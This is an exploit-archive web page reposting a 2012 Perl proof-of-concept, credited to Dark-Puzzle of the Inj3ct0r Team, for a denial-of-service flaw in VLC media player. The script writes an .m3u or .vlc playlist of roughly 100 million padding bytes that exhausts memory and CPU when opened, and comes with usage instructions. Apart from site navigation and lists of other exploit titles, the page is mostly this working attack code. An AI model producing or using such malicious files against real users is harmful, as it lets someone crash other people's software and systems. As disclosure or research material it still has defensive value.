首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC All versions - .m3u/.vlc DoS Memory Exhaustion Vulnerability
来源:www.datasec.x90x.net 作者:Dark-Puzzle 发布时间:2012-08-20  
#!/usr/bin/perl
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0      _                   __           __       __                      1
# 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
# 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
# 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
# 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
# 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
# 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
# 1                   \ \____/ >> Exploit database separated by exploit    0
# 0                    \/___/          type (local, remote, DoS, etc.)     1
# 1                                                                        1
# 0   [x] Official Website: http://www.1337day.com                         0
# 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
# 0                                                                        0
# 1               ==========================================               1
# 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                 Pentesting/exploit coding/bug research                 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
        
# Exploit Title: VLC All versions - .m3u/.vlc DoS Memory Exhaustion Vulnerability .
# Date: 19 August 2012
# Author: Dark-Puzzle
# Author's Website : www.datasec.x90x.net
# Risk : Medium
# Vendor Website : http://www.videolan.org
# Version: All Versions Are Vulnerable .
# Category: DoS/PoC
# Tested on: Windows Xp Service Pack 2 / Windows 7 (64 bit).

#About
#The Vuln Consists that VLC player displays the Internal content of the .m3u and .vlc files , the content isn't
#known by VLC so it Will be displayed in the error log (All The Content) & in the Stack (Only the "A"s) increasing & increasing causing the DoS Vuln .
#The System Performance is Increased when the exploit is running and the CPU Usage can reach 98% .
#the file may take some time to create and 4 seconds before it starts playing .

# The Same file can be used for both .m3u & .vlc 
#Usage : perl dos.pl > file.m3u
# OR     perl dos.pl > file.vlc

my $ext = "\x23\x45\x58\x54\x4d\x33\x55";
my $ff= "\x00\x00\x00\x00\x41\x41\x00\x00\x00\x00";
my $b = "\x41" x 99989969 ;
my $c = "\xff" x 100 ;
print $ext.$ff.$b.$c.$ff;

#-----------------Solution-------------------#
# Vendor has been contacted about this issue #
#--------------------------------------------#

#Greetz to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Divx 6.8.2 - Denial Of Service
·Sysax Multi-Server 5.64 Create
·Adobe Flash Player 11.3 Font P
·Apple Quicktime plugin - Windo
·Sysax Multi Server 5.64 Create
·Mozilla Firefox 14.01 Memory E
·Symantec Web Gateway <= 5.0.3.
·AOL Products downloadUpdater2
·Symantec Web Gateway <= 5.0.3.
·E-Mail Security Virtual Applia
·SAP Netweaver Dispatcher 7.0 E
·globalSCAPE CuteZIP Stack Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved